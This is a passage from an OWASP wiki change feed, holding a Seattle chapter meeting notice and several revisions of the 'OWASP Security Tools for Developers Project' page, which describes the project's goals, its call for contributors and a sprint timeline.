** '''XML Digital Signature and Encryption: Use and Abuse''' - The WS-Security set of standards is on the threshold of ubiquitous deployment and XML applications have already taken over the world. This presentation looks at two underlying technologies, XML Digital Signature (XMLDSIG) and XML Encryption (XMLENC), their place in the Web Services stack and their applicability to non-SOAP XML applications. Beginning with a basic overview of the standards, we will uncover some surprising caveats and risks in the use of these technologies.&lt;br /&gt;
&lt;br /&gt;
=== Previous Meeting 8 January 2007===&lt;br /&gt;
1/8/2007 @ 6 o'clock - Seattle chapter meeting.  &lt;br /&gt;
&lt;br /&gt;
'''Details:''' Location: Bellevue Las Margaritas (http://www.lasmargaritasbellevue.com/)&lt;br /&gt;
Time: 6 o’clock. &lt;br /&gt;
&lt;br /&gt;
Speakers:&lt;br /&gt;
&lt;br /&gt;
Ward Spagenberg of IOActive on the topic &amp;quot;Unraveling PCI&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Since there will be free food, beer and pop, please let Mike de Libero know if you plan to attend so we know how much to order.&lt;br /&gt;
We look forward to seeing you all there!&lt;br /&gt;
&lt;br /&gt;
[[Category:Washington]]&lt;/div&gt;</summary>
		<author><name>Mcurphey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Security_Tools_for_Developers_Project&amp;diff=114892</id>
		<title>OWASP Security Tools for Developers Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Security_Tools_for_Developers_Project&amp;diff=114892"/>
				<updated>2011-08-01T04:34:53Z</updated>
		
		<summary type="html">&lt;p&gt;Mcurphey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==== Home  ====&lt;br /&gt;
&lt;br /&gt;
{| width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! width=&amp;quot;66%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
|- valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| &lt;br /&gt;
This project is focused on defining, designing, developing and configuring security tools for software development teams and their end-to-end software development process. While any reference material or code produced will be focused on an open source stack and Agile development techniques,&amp;amp;nbsp;the concepts should be easily applicable to other styles of software engineering.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Most people accept that tools can be applied effectively to only a fraction of software issues, a fraction that is growing, but at a relatively conservative pace. Tools are however an important and widely adopted part of the process needed to produce functional, stable, reliable and scalable software, where security is one attribute.&amp;amp;nbsp;Most development teams invest heavily in tools to improve their process and maintain end-to-end development environments, including managing requirements and user stories, IDEs, test management, source code management, version control, continuous integration, deployment and monitoring. &lt;br /&gt;
&lt;br /&gt;
Most security tools today are written by and for security people who often (understandably)&amp;amp;nbsp;have a different lens and different needs from software developers and development teams. &lt;br /&gt;
&lt;br /&gt;
This project is operating under the belief that infusing security into the development team's workflow through effective tools will have a significant impact on improving the security quality of the code they produce.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
You can think of it as a project for developers by developers to improve software quality through better tooling that just so happens to be about security.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
[[Image:Owasp std.png]] &lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
|- valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| &lt;br /&gt;
== Wanna get involved?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]]'''....join the discussion [https://lists.owasp.org/mailman/listinfo/owasp-std mailing list]''' &lt;br /&gt;
&lt;br /&gt;
While the project is open to all, we are particularly looking for developers who will actively contribute code. We are especially interested in any developers that have experience in customizing Jenkins, extending Git, unit testing frameworks or customizing management tools like ScrumDo. We are also interested in any developers interested in extending behaviour driven development testing frameworks like JBehave.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Join the mailing list, hang out and say hi or contact the project leader&amp;amp;nbsp;[mailto:mark@curphey.com?subject=OWASP%20STD%20Project Mark Curphey]. &lt;br /&gt;
&lt;br /&gt;
*[https://lists.owasp.org/mailman/listinfo/owasp-std mailing list]&lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
== What exactly are you producing?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]]'''....the 50,000 ft plan''' &lt;br /&gt;
&lt;br /&gt;
The project is still in its infancy but the plan is to produce the following: &lt;br /&gt;
&lt;br /&gt;
*Reference Architecture &lt;br /&gt;
*Reference Implementation&lt;br /&gt;
&lt;br /&gt;
As part of those two key areas we expect to build or customize tools and develop configuration guides for particular technologies. While we don't yet know exactly what that will include it may include IDE plugins or extensions to common testing frameworks to make integrating security tests easier. &amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
== How are you doing this?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]]&amp;amp;nbsp;'''....by being Agile of course!''' &lt;br /&gt;
&lt;br /&gt;
We are planning to run the project like an Agile software project itself by building a backlog and running sprints. We may even try and use Google Hangouts for video stand-up meetings! &lt;br /&gt;
&lt;br /&gt;
Our current timeline looks like: &lt;br /&gt;
&lt;br /&gt;
*August - Project Planning &lt;br /&gt;
*September - Sprint 1 &lt;br /&gt;
*October - Sprint 2 &lt;br /&gt;
*November - Sprint 3 &lt;br /&gt;
*December - Sprint 4&lt;br /&gt;
&lt;br /&gt;
In due course (when we have a backlog) we will publish a roadmap.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; __NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mcurphey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Security_Tools_for_Developers_Project&amp;diff=114891</id>
		<title>OWASP Security Tools for Developers Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Security_Tools_for_Developers_Project&amp;diff=114891"/>
				<updated>2011-08-01T02:06:40Z</updated>
		
		<summary type="html">&lt;p&gt;Mcurphey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==== Home  ====&lt;br /&gt;
&lt;br /&gt;
{| width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! width=&amp;quot;66%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
|- valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| &lt;br /&gt;
This project is focused on defining, designing, developing and configuring security tools for software development teams and their end-to-end software development process. While any reference material or code produced will be focused on an open source stack and Agile development techniques,&amp;amp;nbsp;the concepts should be easily applicable to other styles of software engineering.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Most people accept that tools can be applied effectively to only a fraction of software issues, a fraction that is growing, but at a relatively conservative pace. Tools are however an important and widely adopted part of the process needed to produce functional, stable, reliable and scalable software, where security is one attribute.&amp;amp;nbsp;Most development teams invest heavily in tools to improve their process and maintain end-to-end development environments, including managing requirements and user stories, IDEs, test management, source code management, version control, continuous integration, deployment and monitoring. &lt;br /&gt;
&lt;br /&gt;
Most security tools today are written by and for security people who often (understandably)&amp;amp;nbsp;have a different lens and different needs from software developers and development teams. &lt;br /&gt;
&lt;br /&gt;
This project is operating under the belief that infusing security into the development team's workflow through effective tools will have a significant impact on improving the security quality of the code they produce.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
You can think of it as a project for developers by developers to improve software quality through better tooling that just so happens to be about security.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
[[Image:Owasp std.png]] &lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
|- valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| &lt;br /&gt;
== Wanna get involved?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]]'''....join the discussion [https://lists.owasp.org/mailman/listinfo/owasp-std mailing list]''' &lt;br /&gt;
&lt;br /&gt;
While the project is open to all, we are particularly looking for developers who will actively contribute code. We are especially interested in any developers that have experience in customizing Jenkins, extending Git, unit testing frameworks or customizing management tools like ScrumDo. We are also interested in any developers interested in extending behaviour driven development testing frameworks like JBehave.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Join the mailing list, hang out and say hi or contact the project leader&amp;amp;nbsp;[mailto:mark@curphey.com?subject=OWASP%20STD%20Project Mark Curphey]. &lt;br /&gt;
&lt;br /&gt;
*[https://lists.owasp.org/mailman/listinfo/owasp-std mailing list]&lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
== What exactly are you producing?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]]'''....the 50,000 ft plan''' &lt;br /&gt;
&lt;br /&gt;
The project is still in its infancy but the plan is to produce the following: &lt;br /&gt;
&lt;br /&gt;
*Reference Architecture &lt;br /&gt;
*Reference Implementation&lt;br /&gt;
&lt;br /&gt;
As part of those two key areas we expect to build or customize tools and develop configuration guides for particular technologies. While we don't yet know exactly what that will include it may include IDE plugins or extensions to common testing frameworks to make integrating security tests easier. &amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
== How are you doing this?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]]&amp;amp;nbsp;'''....by being Agile of course!''' &lt;br /&gt;
&lt;br /&gt;
We are planning to run the project like an Agile software project itself by building a backlog and running sprints. We may even try and use Google Hangouts for video stand-up meetings! &lt;br /&gt;
&lt;br /&gt;
Our current timeline looks like: &lt;br /&gt;
&lt;br /&gt;
*August - Project Planning &lt;br /&gt;
*September - Sprint 1 &lt;br /&gt;
*October - Sprint 2 &lt;br /&gt;
*November - Sprint 3 &lt;br /&gt;
*December - Sprint 4&lt;br /&gt;
&lt;br /&gt;
In due course (when we have a backlog) we will publish a roadmap.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; __NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mcurphey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Security_Tools_for_Developers_Project&amp;diff=114889</id>
		<title>OWASP Security Tools for Developers Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Security_Tools_for_Developers_Project&amp;diff=114889"/>
				<updated>2011-08-01T02:05:17Z</updated>
		
		<summary type="html">&lt;p&gt;Mcurphey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==== Home  ====&lt;br /&gt;
&lt;br /&gt;
{| width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! width=&amp;quot;66%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
|- valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| &lt;br /&gt;
This project is focused on defining, designing, developing and configuring security tools for software development teams and their end-to-end software development process. While any reference material or code produced will be focused on an open source stack and Agile development techniques,&amp;amp;nbsp;the concepts should be easily applicable to other styles of software engineering.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Most people accept that tools can be applied effectively to only a fraction of software issues, a fraction that is growing, but at a relatively conservative pace. Tools are however an important and widely adopted part of the process needed to produce functional, stable, reliable and scalable software, where security is one attribute.&amp;amp;nbsp;Most development teams invest heavily in tools to improve their process and maintain end-to-end development environments, including managing requirements and user stories, IDEs, test management, source code management, version control, continuous integration, deployment and monitoring. &lt;br /&gt;
&lt;br /&gt;
Most security tools today are written by and for security people who often (understandably)&amp;amp;nbsp;have a different lens and different needs from software developers and development teams. &lt;br /&gt;
&lt;br /&gt;
This project is operating under the belief that infusing security into the development team's workflow through effective tools will have a significant impact on improving the security quality of the code they produce.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
You can think of it as a project for developers by developers to improve software quality through better tooling that just so happens to be about security.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
[[Image:Owasp std.png]] &lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
|- valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| &lt;br /&gt;
== Wanna get involved?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]]'''....join the discussion [https://lists.owasp.org/mailman/listinfo/owasp-std mailing list]''' &lt;br /&gt;
&lt;br /&gt;
While the project is open to all, we are particularly looking for developers who will actively contribute code. We are especially interested in any developers that have experience in customizing Jenkins, extending Git, unit testing frameworks or customizing management tools like ScrumDo. We are also interested in any developers interested in extending behaviour driven development testing frameworks like JBehave.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Join the mailing list, hang out and say hi or contact the project leader&amp;amp;nbsp;[mailto:mark@curphey.com?subject=OWASP%20STD%20Project Mark Curphey]. &lt;br /&gt;
&lt;br /&gt;
*[https://lists.owasp.org/mailman/listinfo/owasp-std mailing list]&lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
== What exactly are you producing?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]]'''....the 50,000 ft plan''' &lt;br /&gt;
&lt;br /&gt;
The project is still in its infancy but the plan is to produce the following: &lt;br /&gt;
&lt;br /&gt;
*Reference Architecture &lt;br /&gt;
*Reference Implementation&lt;br /&gt;
&lt;br /&gt;
As part of those two key areas we expect to build or customize tools and develop configuration guides for particular technologies. While we don't yet know exactly what that will include it may include IDE plugins or extensions to common testing frameworks to make integrating security tests easier. &amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
== How are you doing this?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]]&amp;amp;nbsp;'''....by being Agile of course!''' &lt;br /&gt;
&lt;br /&gt;
We are planning to run the project like an Agile software project itself by building a backlog and running sprints. We may even try and use Google Hangouts for video stand-up meetings! &lt;br /&gt;
&lt;br /&gt;
Our current timeline looks like:&lt;br /&gt;
&lt;br /&gt;
*August - Project Planning &lt;br /&gt;
*September - Sprint 1 &lt;br /&gt;
*October - Sprint 2 &lt;br /&gt;
*November - Sprint 3 &lt;br /&gt;
*December - Sprint 4&lt;br /&gt;
&lt;br /&gt;
In due course (when we have a backlog) we will publish a roadmap.&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; __NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mcurphey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Security_Tools_for_Developers_Project&amp;diff=114885</id>
		<title>OWASP Security Tools for Developers Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Security_Tools_for_Developers_Project&amp;diff=114885"/>
				<updated>2011-07-31T19:49:30Z</updated>
		
		<summary type="html">&lt;p&gt;Mcurphey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==== Home  ====&lt;br /&gt;
&lt;br /&gt;
{| width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! width=&amp;quot;66%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
|- valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| &lt;br /&gt;
This project is focused on defining, designing, developing and configuring security tools for software development teams and their end-to-end software development process. While any reference material or code produced will be focused on an open source stack and Agile development techniques,&amp;amp;nbsp;the concepts should be easily applicable to other styles of software engineering.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Most people accept that tools can be applied effectively to only a fraction of software issues, a fraction that is growing, but at a relatively conservative pace. Tools are however an important and widely adopted part of the process needed to produce functional, stable, reliable and scalable software, where security is one such attribute.&amp;amp;nbsp;Most development teams invest heavily in tools to improve their process and maintain end-to-end development environments, including managing requirements and user stories, IDEs, test management, source code management, version control, continuous integration, deployment and monitoring. &lt;br /&gt;
&lt;br /&gt;
Many security tools today are written by and for security people who often (understandably)&amp;amp;nbsp;have a different lens and different needs from software developers and development teams. &lt;br /&gt;
&lt;br /&gt;
This project is operating under the belief that infusing security into the development team's workflow through effective tools will have a significant impact on improving the security quality of the code they produce.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
You can think of it as a project for developers by developers that just so happens to be about security.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
[[Image:Owasp std.png]] &lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
|- valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| &lt;br /&gt;
== Wanna get involved?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]]'''....join the discussion [https://lists.owasp.org/mailman/listinfo/owasp-std mailing list]''' &lt;br /&gt;
&lt;br /&gt;
While the project is open to all, we are particularly looking for developers who will actively contribute code. We are especially interested in any developers that have experience customizing Jenkins, extending Git, unit testing frameworks or customizing management tools like ScrumDo. We are also interested in any developers interested in extending behaviour driven development testing frameworks like Cucumber.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Join the mailing list, hang out and say hi or contact the project leader&amp;amp;nbsp;[mailto:mark@curphey.com?subject=OWASP%20STD%20Project Mark Curphey]. &lt;br /&gt;
&lt;br /&gt;
*[https://lists.owasp.org/mailman/listinfo/owasp-std mailing list]&lt;br /&gt;
&lt;br /&gt;
|&lt;br /&gt;
&lt;br /&gt;
== What exactly are you producing?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]]'''....the 50,000 ft plan''' &lt;br /&gt;
&lt;br /&gt;
The project is still in its infancy but the plan is to produce the following: &lt;br /&gt;
&lt;br /&gt;
*Reference Architecture &lt;br /&gt;
*Reference Implementation&lt;br /&gt;
&lt;br /&gt;
As part of those two key areas we expect to build or customize tools and develop configuration guides for particular technologies. While we don't yet know exactly what that will include it may include IDE plugins or extensions to common testing frameworks to make integrating security tests easier. &amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
== How are you doing this?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]]&amp;amp;nbsp;'''....by being Agile of course!''' &lt;br /&gt;
&lt;br /&gt;
We are planning to run the project like an Agile software project itself by building a backlog and running sprints. We may even try and use Google Hangouts for video stand-up meetings! &lt;br /&gt;
&lt;br /&gt;
*August - Project Planning &lt;br /&gt;
*September - Sprint 1 &lt;br /&gt;
*October - Sprint 2 &lt;br /&gt;
*November - Sprint 3 &lt;br /&gt;
*December - Sprint 4&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; __NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mcurphey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Security_Tools_for_Developers_Project&amp;diff=114884</id>
		<title>OWASP Security Tools for Developers Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Security_Tools_for_Developers_Project&amp;diff=114884"/>
				<updated>2011-07-31T19:48:28Z</updated>
		
		<summary type="html">&lt;p&gt;Mcurphey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==== Home  ====&lt;br /&gt;
&lt;br /&gt;
{| width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! width=&amp;quot;66%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
|- valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| &lt;br /&gt;
This project is focused on defining, designing, developing and configuring security tools for software development teams and their end-to-end software development process. While any reference material or code produced will be focused on an open source stack and Agile development techniques,&amp;amp;nbsp;the concepts should be able to be easily applied to other styles of software engineering.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Most people accept that tools can only effectively be applied to a fraction of software issues, where that fraction is generally increasing but at a relatively conservative pace. Tools are, however, an important and widely adopted part of the process needed to produce functional, stable, reliable and scalable software, where security is one such attribute.&amp;amp;nbsp;Most development teams invest heavily in tools to improve their process and maintain end-to-end development environments, including managing requirements and user stories, IDEs, test management, source code management, version control, continuous integration, deployment and monitoring. &lt;br /&gt;
&lt;br /&gt;
Many security tools today are written by and for security people who often (understandably)&amp;amp;nbsp;have a different lens and different needs from software developers and development teams. &lt;br /&gt;
&lt;br /&gt;
This project is operating under the belief that infusing security into the development teams' workflow through effective tools will have a significant impact on improving the security quality of the code they produce.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
You can think of it as a project for developers by developers that just so happens to be about security.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
[[Image:Owasp std.png]] &lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
|- valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| &lt;br /&gt;
== Wanna get involved?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]]'''....join the discussion''' &lt;br /&gt;
&lt;br /&gt;
While the project is open to all, we are particularly looking for developers who will actively contribute code. We are especially interested in any developers that have experience of customizing Jenkins, extending Git, unit testing frameworks or customizing management tools like ScrumDo. We are also interested in any developers interested in extending behaviour driven development testing frameworks like Cucumber.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Join the mailing list, hang out and say hi or contact the project leader&amp;amp;nbsp;[mailto:mark@curphey.com?subject=OWASP%20STD%20Project Mark Curphey]. &lt;br /&gt;
&lt;br /&gt;
*[https://lists.owasp.org/mailman/listinfo/owasp-std mailing list (this is the main list)]&lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
== What exactly are you producing?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]]'''....the 50,000 ft plan''' &lt;br /&gt;
&lt;br /&gt;
The project is still in its infancy, but the plan is to produce the following: &lt;br /&gt;
&lt;br /&gt;
*Reference Architecture &lt;br /&gt;
*Reference Implementation&lt;br /&gt;
&lt;br /&gt;
As part of those two key areas we expect to build or customize tools and develop configuration guides for particular technologies. While we don't yet know exactly what that will include it may include IDE plugins or extensions to common testing frameworks to make integrating security tests easier. &amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
== How are you doing this?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]]&amp;amp;nbsp;'''....by being Agile of course!''' &lt;br /&gt;
&lt;br /&gt;
We are planning to run the project like an Agile software project itself by building a backlog and running sprints. We may even try and use Google Hangouts for video stand-up meetings! &lt;br /&gt;
&lt;br /&gt;
*August - Project Planning &lt;br /&gt;
*September - Sprint 1 &lt;br /&gt;
*October - Sprint 2 &lt;br /&gt;
*November - Sprint 3 &lt;br /&gt;
*December - Sprint 4&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; __NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mcurphey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Owasp_std.png&amp;diff=114883</id>
		<title>File:Owasp std.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Owasp_std.png&amp;diff=114883"/>
				<updated>2011-07-31T19:31:42Z</updated>
		
		<summary type="html">&lt;p&gt;Mcurphey: uploaded a new version of &amp;amp;quot;File:Owasp std.png&amp;amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;OWASP STD Project Banner&lt;/div&gt;</summary>
		<author><name>Mcurphey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Security_Tools_for_Developers_Project&amp;diff=114882</id>
		<title>OWASP Security Tools for Developers Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Security_Tools_for_Developers_Project&amp;diff=114882"/>
				<updated>2011-07-31T19:28:46Z</updated>
		
		<summary type="html">&lt;p&gt;Mcurphey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==== Home  ====&lt;br /&gt;
&lt;br /&gt;
{| width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! width=&amp;quot;66%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
|- valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| &lt;br /&gt;
This project is focused on defining, designing, developing and configuring security tools for software development teams and their end-to-end software development process. While any reference material or code produced will be focused on an open source stack and Agile development techniques,&amp;amp;nbsp;the concepts should be able to be easily applied to other styles of software engineering.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Most people accept that tools can only effectively be applied to a fraction of software issues, where that fraction is generally increasing but at a relatively conservative pace. Tools are, however, an important and widely adopted part of the process needed to produce functional, stable, reliable and scalable software, where security is one such attribute.&amp;amp;nbsp;Most development teams invest heavily in tools to improve their process and maintain end-to-end development environments, including managing requirements and user stories, IDEs, test management, source code management, version control, continuous integration, deployment and monitoring. &lt;br /&gt;
&lt;br /&gt;
Many security tools today are written by and for security people who often (understandably)&amp;amp;nbsp;have a different lens and different needs from software developers and development teams. &lt;br /&gt;
&lt;br /&gt;
This project is operating under the belief that infusing security into the development teams' workflow through effective tools will have a significant impact on improving the security quality of the code they produce.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
You can think of it as a project for developers by developers that just so happens to be about security.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
[[Image:Owasp std.png]] &lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
|- valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| &lt;br /&gt;
== Wanna get involved?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]]'''....join the discussion''' &lt;br /&gt;
&lt;br /&gt;
While the project is open to all, we are particularly looking for developers who will actively contribute code. We are especially interested in any developers that have experience of customizing Jenkins, extending Git, unit testing frameworks or customizing management tools like ScrumDo. We are also interested in any developers interested in extending behaviour driven development testing frameworks like Cucumber.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Join the mailing list, hang out and say hi or contact the project leader&amp;amp;nbsp;[mailto:mark@curphey.com?subject=OWASP%20STD%20Project Mark Curphey]. &lt;br /&gt;
&lt;br /&gt;
*[https://lists.owasp.org/mailman/listinfo/owasp-std mailing list (this is the main list)]&lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
== What exactly are you producing?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]]'''....the 50,000 ft plan''' &lt;br /&gt;
&lt;br /&gt;
The project is still in its infancy, but the plan is to produce the following: &lt;br /&gt;
&lt;br /&gt;
*Reference Architecture &lt;br /&gt;
*Reference Implementation&lt;br /&gt;
&lt;br /&gt;
As part of those two key areas we expect to build or customize tools and develop configuration guides for particular technologies. While we don't yet know exactly what that will include, it may include IDE plugins or extensions to common testing frameworks to make integrating security tests easier. &amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
== How are you doing this?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]]&amp;amp;nbsp;'''....by being Agile of course!''' &lt;br /&gt;
&lt;br /&gt;
We are planning to run the project like an Agile software project itself by building a backlog and running sprints. We may even try and use Google Hangouts for video stand-up meetings! &lt;br /&gt;
